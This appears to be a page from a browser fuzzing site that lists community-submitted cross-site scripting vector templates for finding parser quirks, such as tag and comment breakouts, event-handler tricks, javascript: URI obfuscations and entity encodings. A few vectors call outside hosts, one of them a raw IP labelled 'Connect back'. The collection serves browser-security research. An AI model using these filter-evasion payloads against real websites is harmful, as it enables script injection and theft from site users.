Featured vector

Chrome 0.0
<Ffoo:img src="xx:xx" id="baz1" /> <script> if(document.getElementById("baz1")) { alert(1); } </script>

Fuzz vector cloud

2,442,103 Successful fuzzes

Fuzz Vectors

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Characters allowed at the start of a namespace <*chr*foo:img src="xx:xx" id="baz*num*" /> <script> if(document.getElementById("baz*num*")) { logChr(*num*); } </script> @agasfasgasdasds
test3_kinmen <!-- sample vector --> <img src=http://www.kinmen.gov.tw/*chr* onerror=logChr(*num*)> @kinmenhacker
String quotes in JS context <script>s*num* = *chr**num**chr*;if (typeof s*num* == "string" && s*num* == "*num*") logChr(*num*);</script> @blubbfiction
before_img <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @han7er
o replacement in event handlers <img src=xx:xx *chr*nerror=logChr(*num*)> @blubbfiction
Characters that close tags <script*chr*logChr(*num*)</script> @blubbfiction
Valid characters between attribute and value instead of <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Replacement characters for between attribute and value <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Characters that close a HTML comment 4 <!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @irsdl
Characters that separate JavaScript object key and value <script> var obj = {"foo"*chr*"bar"}; logChr(*num*) </script> @peksa
JavaScript operators that separate objects and scopes <script> var v = {}*chr*{"string in blockscope"} logChr(*num*) </script> @peksa
JavaScript operators that evaluate argument in variable assignment <script> var v = {}*chr*logChr(*num*) </script> @peksa
Things that break from URIs javascript comments <a href="javascript://*chr*logChr(*num*)">aaa</a> @0xAli
Characters allowed between event handlers and equal sign <img src="about:blank" onerror*chr*=logChr(*num*)> @peksa
HTML input image tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> @peksa
HTML input tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> @peksa
Characters that start JavaScript double quote strings <script> *chr*"; logChr(*num*) </script> @peksa
Characters that escape JavaScript single line comments <script> // hmm *chr*logChr(*num*) </script> @peksa
Ignored characters in javascript protocol uris <script> var a = document.createElement('a'); a.href = "java\u*hex4*script:alert()"; if (a.href === "javascript:alert()") { logChr(*num*); } </script> @peksa
Characters that escape html input tag <input value="" *chr*<script>logChr(*num*)</script> foo="" type="text"> @peksa
rand chr after opening tag <*chr*img/src=xx:xx on*chr*error=logChr(*num*)> @mehimansu
prompt <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @sharath_unni
replacement *chr*img src=xx:xx onerror=logChr(*num*)> @matttiko
Characters that close a HTML comment 0021 <!--*chr*><img src=xxx:x onerror=log(*num*)> --> @matttiko
script var separator <script> var a = "olol123*chr* <logChr(*num*)// </script> @i_bo0om
svg animate onbegin <svg id="svg" xmlns="http://www.w3.org/2000/svg"> <rect id="rectID" width="100" height="100" fill="green"> <animate id="selfID" onbegin=logChr(*num*) attributeName="x" begin="0s; selfID.end" dur="0.5s" from="0" to="100"/> </rect> </svg> @JohnathanKuskos
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
stuff <!-- sample vector --> <img src='xx:xx*chr*' onerror='logChr(*num*) baz= '> @largenocream
Characters that separate JavaScript assignment statements <script> var a={}*chr*b={}&logChr(*num*); </script> @Giutro
object data separator <object*chr*data="data:text/html;base64,PHNjcmlwdD5sb2dDaHIoKm51bSopPC9zY3JpcHQ+"></object> @i_bo0om
Characters that allow a new statement to begin2 <script> var a={}*chr*b=logChr(*num*); </script> @tifkin_
Characters that allow a new statement to begin <script> var a={}*chr*logChr(*num*); </script> @tifkin_
testquote <!-- sample vector --> <img src=xx:xx onerror=logChr(*num*)*chr*"> @matttiko
testabc <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @matttiko
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Data URI What can replace the in data <script src="data*chr*,log(*num*)"></script> @skeptic_fx
Characters that can be used close tags2 <script>logChr(*num*)<*chr*script></script> @tifkin_
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
fssadf dfads fdasf <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @phpdevops
img tag overflow2 <img src=http://runinfinity.com/wp-content/uploads/2012/01/Kinmen_Marathon_coursemap.jpg *chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr* onerror=logChr(*num*)> @kinmenhacker
img tag overflow <img src=xx:xx *chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr* onerror=logChr(*num*)> @kinmenhacker
fuzzer set2 <article onerror=log(*num*) data-animal-type="bird"> <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>*datacsspropertynames*</td></tr> <tr><td>datadhtmlprops</td><td>*datadhtmlprops*</td></tr> <tr><td>dataentities</td><td>*dataentities*</td></tr> <tr><td>dataevents</td><td>*dataevents*</td></tr> <tr><td>dataevil</td><td>*dataevil*</td></tr> <tr><td>datahtmlattributes</td><td>*datahtmlattributes*</td></tr> <tr><td>datahtmlelements</td><td>*datahtmlelements*</td></tr> <tr><td>datahtmlelements2</td><td>*datahtmlelements2*</td></tr> <tr><td>dataints</td><td>*dataints*</td></tr> <tr><td>datajscsspropertynames</td><td>*datajscsspropertynames*</td></tr> <tr><td>datajsproperties</td><td>*datajsproperties*</td></tr> <tr><td>datajstest</td><td>*datajstest*</td></tr> <tr><td>datajstest2</td><td>*datajstest2*</td></tr> <tr><td>datajstest3</td><td>*datajstest3*</td></tr> <tr><td>datajstest4</td><td>*datajstest4*</td></tr> <tr><td>datajstest5</td><td>*datajstest5*</td></tr> <tr><td>datamyevents</td><td>*datamyevents*</td></tr> <tr><td>dataprotocols</td><td>*dataprotocols*</td></tr> <tr><td>dataShortHtmlAttributes</td><td>*dataShortHtmlAttributes*</td></tr> <tr><td>dataShortHtmlElements</td><td>*dataShortHtmlElements*</td></tr> <tr><td>datasvgelements</td><td>*datasvgelements*</td></tr> </table> </article> @kinmenhacker
html5 article <article onerror=log(*num*) data-animal-type="bird"> <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>*datacsspropertynames*</td></tr> <tr><td>datadhtmlprops</td><td>*datadhtmlprops*</td></tr> <tr><td>dataentities</td><td>*dataentities*</td></tr> <tr><td>dataevents</td><td>*dataevents*</td></tr> <tr><td>dataevil</td><td>*dataevil*</td></tr> <tr><td>datahtmlattributes</td><td>*datahtmlattributes*</td></tr> <tr><td>datahtmlelements</td><td>*datahtmlelements*</td></tr> <tr><td>datahtmlelements2</td><td>*datahtmlelements2*</td></tr> <tr><td>dataints</td><td>*dataints*</td></tr> <tr><td>datajscsspropertynames</td><td>*datajscsspropertynames*</td></tr> <tr><td>datajsproperties</td><td>*datajsproperties*</td></tr> <tr><td>datajstest</td><td>*datajstest*</td></tr> <tr><td>datajstest2</td><td>*datajstest2*</td></tr> <tr><td>datajstest3</td><td>*datajstest3*</td></tr> <tr><td>datajstest4</td><td>*datajstest4*</td></tr> <tr><td>datajstest5</td><td>*datajstest5*</td></tr> <tr><td>datamyevents</td><td>*datamyevents*</td></tr> <tr><td>dataprotocols</td><td>*dataprotocols*</td></tr> <tr><td>dataShortHtmlAttributes</td><td>*dataShortHtmlAttributes*</td></tr> <tr><td>dataShortHtmlElements</td><td>*dataShortHtmlElements*</td></tr> <tr><td>datasvgelements</td><td>*datasvgelements*</td></tr> </table> </article> @kinmenhacker
Connect back <img src="http://140.134.25.107/?chr=*chr*&num=*num*" onerror=logChr(*num*)> @kinmenhacker
Test iOS html5 <audio controls> <source src="*chr*.*chr*" type="*chr*/*chr*" onerror= log(*num*)> Your browser does not support the audio element. </audio> @kinmenhacker
Separators <svg*chr*onload=logChr(*num*)> @JohnathanKuskos
digits <script>/^\d$/.test('*chr*')&&logChr(*num*);</script> @garethheyes
new lines <script> if(/\s/.test('*uni*')&&!/./.test('*uni*'))logChr(*num*) </script> @garethheyes
spaces <script> if(/\s/.test('*chr*'))logChr(*num*) </script> @garethheyes
Characters to break VBScript comments <script language="vbscript"> '*chr*log(*num*)' </script> @0x6D6172696F
Characters preceding function call inside throw block <body onload=throw[onerror=a=*chr*logChr(*num*),a]> @JohnathanKuskos
chr before alert(1) <input onfocus=*chr*:alert(1) autofocus> @Mramydnei
charecter between two URI <a href="http://*chr*javascript:alert(1)">testxss</a> @Mramydnei
characters that behave like equal signs in attribute value <img src== onerror="a*chr*logChr(*num*)"> @JohnathanKuskos
test for progress <progress value="*num*" max="*num*"></progress> @kinmenhacker
test for tag name <*chr* width="*num*px">*datajstest4**datajstest4**datajstest4**dataShortHtmlAttributes**dataShortHtmlAttributes**dataShortHtmlAttributes**datajstest4* @kinmenhacker
Characters that dont inhibit eventhandlers <img src=xx:xx o*chr*nerror=logChr(*num*)> @tifkin_
im fish <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @Mramydnei
wwwemogiccom <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*num**datajstest4**datacsspropertynames**datacsspropertynames* @vpelss
Characters that make a double quote valid <script> *chr*"; logChr(*num*); </script> @tifkin_
Characters allowed after domain <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed before http <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters that will be mutated to a correct URI 5 <ifr*chr*ame id="lol*num*" src="http://shazzer.co.uk" onload=logChr(*num*);> <i>:)</i> </iframe> @avlidienbrunn
Characters that will be mutated to a correct URI 4 <script> function report*num*(num){ var lol = document.getElementById('lol*num*'); if(/http:\/\/shazzer/.test(lol.src)){ logChr(*num*); } } </script> <iframe id="lol*num*" src="http://*chr*shazzer.co.uk" onload=report*num*(*num*)> <p>The browser does not support iframes.</p> </iframe> @avlidienbrunn
XSS Vector Command Tag <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>*datajscsspropertynames* @rafaybaloch
Characters that will be mutated to a correct URI 3 <script> function report*num*(num){ var lol = document.getElementById('lol*num*'); if(/uk\//.test(lol.src)){ logChr(*num*); } } </script> <iframe id="lol*num*" src="http://shazzer.co.uk*chr*break" onload=report*num*(*num*)> <p>The browser does not support iframes.</p> </iframe> @avlidienbrunn
Characters that can be used close tags <script>logChr(*num*)<*chr*script> @tifkin_
Characters allowed to hex encodings of javascript variables <script> lo\u*chr*0067Chr(*num*); </script> @tifkin_
Characters allowed to hex encode javascript <script> lo\*chr*0067Chr(*num*); </script> @tifkin_
Characters allowed in between dashes to end html comments <!-- -*chr*-> <script>logChr(*num*)</script> --> @JohnathanKuskos
Characters allowed between JS function names and parentheses <script> logChr*chr*(*num*); </script> @tifkin_
Protocols before Javascript to run code by using Flash navigateURL <script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe> @irsdl
Characters allowed before script tag name <*chr*script> logChr(*num*) </script> @tifkin_
chars allowed between js comment v2 <script>logChr(*num*)*chr*'</script> @insertScript
chars allowed between js comment <script>logChr(*num*)/*chr*/'</script> @insertScript
allowed char in js comment <script>logChr(*num*)<*chr*!-- '</script> @insertScript
Characters that result in multiline strings <script> var a = "*chr* "; logChr(*num*); </script> @tifkin_
Charactes that complete single quote <script> var a=*chr*'; logChr(*num*); </script> @tifkin_
Characters allowed between property accessor and property <script> if(document.*chr*body === document.body) { logChr(*num*); } </script> @tifkin_
Characters that escape escapes <script> var x = "*chr*\"; logChr(*num*); </script> @JohnathanKuskos
Characters that break out of quoted attributes2 <img src="1*chr* onerror="logChr(*num*)"> @tifkin_
img onload with only one char in src <img src=*chr* onload=logChr(*num*)> @insertScript
Characters allowed between 2 consecutive functions <script> function a() {} </script> <img src=1 onerror="a()*chr*logChr(*num*)"> @tifkin_
Characters allowed before single functions in event handlers <img src=1 onerror="*chr*logChr(*num*)"> @tifkin_
Characters that can set event handlers3 <img src=1 onerror*chr*"logChr(*num*)"> @tifkin_
characters which turn into a comment <svg><script>lo<*chr*>gChr(*num*)</script></svg> @insertScript
Characters that break attribute names <img src=# aaa*chr*onerror="logChr(*num*)"> @albinowax
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
Characters allowed after string multiline separator <script> var x = "asdf\*chr* asdf"; logChr(*num*); </script> @tifkin_
Characters allowed between attributes <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @tifkin_
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
Characters not encoded with encodeURIComponent <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
Characters not encoded with encodeURI <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
Characters after javascript uri <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @insertScript
characters allowd in html entities <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> @insertScript
Characters before javascript uri <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @insertScript
Easter challenge min sequence 2 <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
Easter challenge min sequence <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+*datajstest5*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
SVG script <svg><script*chr*>logChr(*num*)</script></svg> @garethheyes
Entities allowed with no semi colon htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; @garethheyes
HTML Entity in between and <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> @MisterJyu
JS Property check middle character <img src=xx:xx onerror=window[['log*chr*Chr']](*num*)> @garethheyes
JS Property check ending character <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> @garethheyes
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed within an attribute name (on()load) "'><img src="xx:xx" on*chr*error="log(*num*);"> @skeptic_fx
Characters transformed in expando attributes <div id="fuzzelement*num*" expando*chr*="123">test</div> @garethheyes
Expandos attributes characters removed <div id="fuzzelement*num*" expando*chr*=123>test</div> @garethheyes
Valid chars before img word in img tag <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @ontrif
Equals equivalent signs in attributes <!-- sample vector --> <img src=xx:xx onerror*chr*logChr(*num*)> @WisecWisec
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
is my browser leaking location <iframe src=http://businessinfo.co.uk onload="if(/^http:\/\/businessinfo.co.uk\/?/.test(this.contentWindow.location)){logBoolean(true);}else{logBoolean(false)}"></iframe> @garethheyes
Characters between time and URL in meta redirects <meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"> @avlidienbrunn
Characters allowed inside jsurl <a href="java*chr*script:alert(1)" id="fuzzelement*num*">test</a> @avlidienbrunn
justatest2 <!-- sample vector --> <img*chr*src=xx:xx onerror=logChr(*num*)> @evilcos
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Cookie fuzzing <script> document.cookie='*chr*'; if(document.cookie !== '*chr*') { logChr(*num*,document.cookie); } </script> @garethheyes
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
chars allowed after colon v2 htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed in colon v2 htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed after colon htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; @heyheyheyhey10
Characters consuming spaces between lt and tag name <*chr* script>logChr(*num*)</script> @blubbfiction
Characters allowed as vbscript variables <img src=x:xx onerror="try {execScript('*chr*=1','vbs');log(*num*);}catch(e){}"> @garethheyes
possible chars in base64 encoding <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
Replacement for lt in tag *chr*script>logChr(*num*)</script> @blubbfiction
Characters inside script tag name <scr*chr*ipt>logChr(*num*)</script> @blubbfiction
Characters between lt and tag name <*chr*script>logChr(*num*)</script> @blubbfiction
char for fireing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
aaaaa <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @goroasd
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Entities allowed instead of colon for js protocol htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @peksa
Entities allowed after js protocol htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before js protocol htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed inside js protocol htmlStr = '<a href="java'+*dataentities*+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before CSS rule htmlStr = '<div style="'+*dataentities*+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(*dataentities*); } @garethheyes
img srcX onerroralert(1) <div style="color:red'{}*chr* x:expression(logChr(*num*))*chr*">.</div> @qbye
Break out of HTML element from single quoted attribute <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> @peksa
Escaped characters that break out of single quote HTML attribute <img src='xx:x\*chr* onerror="logChr(*num*)">'> @peksa
Characters that escape single quoted HTML attributes <img src='xx:x*chr* onerror="logChr(*num*)">'> @peksa
Marios challenge <*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*><script>if(test == "1") parent.customLog('<*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*>');</script> @0xAli
Characters syntactically equivalent to double quote in HTML attributes `"'><img src="#*chr* onerror=log(*num*)> @p_laguna
Eating backslash <img src=xx:xx onerror="x='*chr*\',logChr(*num*)//'"> @garethheyes
Character allowed after the slash for end script tag <script>alert(logChr(*num*))</*chr*script> @MisterJyu
Character allowed before the slash for end script tag <script>alert(logChr(*num*))<*chr*/script> @MisterJyu
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Char that allows you to act as a slash in closing tag 2 <script>log(*num*)<*chr*script></script> @notxssninja
Characters that close a HTML comment 3 --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> @DOMXss
Characters that are spaces <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Characters that are new lines <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
JS in img src for selfxss <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> @ethicalhack3r
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters allowed as slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as gt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as lt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as _ in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as s in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as h in http <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url (no slashes) <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed between slashes <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
foobar <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* @Sidhpurwala
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Hex characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> @garethheyes
Characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> @garethheyes
Iframe contentDocument properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Iframe contentWindow properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Document body variables <script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Document variables <script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script> @garethheyes
Function variables <script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Object variables <script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Number variables <script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
String variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Regexp variables <script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Array variables <script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Window variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
aaaaaaaa <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @PunchyStickMeh
prime browser <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @thetestmanager
Alternatives to in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Break out of title <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> @0xAli
